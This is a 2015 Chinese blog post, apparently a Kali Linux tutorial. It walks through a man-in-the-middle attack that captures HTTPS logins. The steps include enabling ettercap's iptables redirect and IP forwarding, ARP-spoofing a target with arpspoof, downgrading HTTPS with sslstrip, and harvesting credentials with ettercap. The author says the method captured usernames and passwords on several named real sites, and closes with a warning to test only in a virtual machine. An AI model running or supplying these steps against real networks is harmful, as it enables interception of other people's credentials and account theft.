易逵

生命中的每一天,都应倍加珍惜……

© 易逵

Powered by LOFTER

Kali 13:使用 sslstrip 和 ettercap 获取 HTTPS 账户与密码

Kali 13:使用 sslstrip 和 ettercap 获取 HTTPS 账户与密码:

HTTPS协议是由SSL+HTTP协议构建的可进行加密传输、身份认证的网络协议,要比http协议安全。如百度、支付宝:



这时如果只是用 ettercap 来进行截取的话,是获取不到相关数据的,这时,就是用到 sslstrip 工具了。

1:修改 /etc/ettercap/etter.conf 文件

命令:vim /etc/ettercap/etter.conf 



找到 #if you use iptables: 一行,

把下面的两个#号去掉。(去掉注释)

vim 文本编辑的简单使用

i :插入编辑。

ESC :返回 。

SHIFT+:         : 返回命令行。

  wq : 保存退出。

2:进行IP转发和arpspoof进行ARP欺骗

IP转发:echo 1 > /proc/sys/net/ipv4/ip_forward

arp欺骗:arpspoof -i eth0 -t 192.168.118.129 192.168.118.2

目标IP:192.168.118.129

网关:192.168.118.2



3:sslstrip 将https转换成http :  sllstrip -a -f -k



4:ettercap 获取账户与密码: ettercap -T -q -i eth0



实际测试过程中,用IE浏览器打开https的网页时,会提示证书错误,有些网站点击确定后即可进行登陆,但是有些网站却是打不开。

用360浏览器打开时,会直接显示 证书风险,此时点击登陆时,并没有出现登陆对话框 :


如果用户使用过程 中,对于证书错误 没有丝毫警觉,一路放过的话,很可以会使得密码泄露了。以下测试了几个网站,均能够截取到用户名与密码,而密码有些是加密的,有些则是明文显示 :

人人网:密码有加密



搜狐网:密码加密了



优酷网:可直接看到密码



京东:也能看到密码



用此方法很大的不便就是 会提示证书错误,有时候这个提示框会一直弹出来,甚至打不开网页。

(警示:技术是把双刃剑,请于虚拟机中测试,切勿用于非法用途!)

发表于2015-08-26.3热度.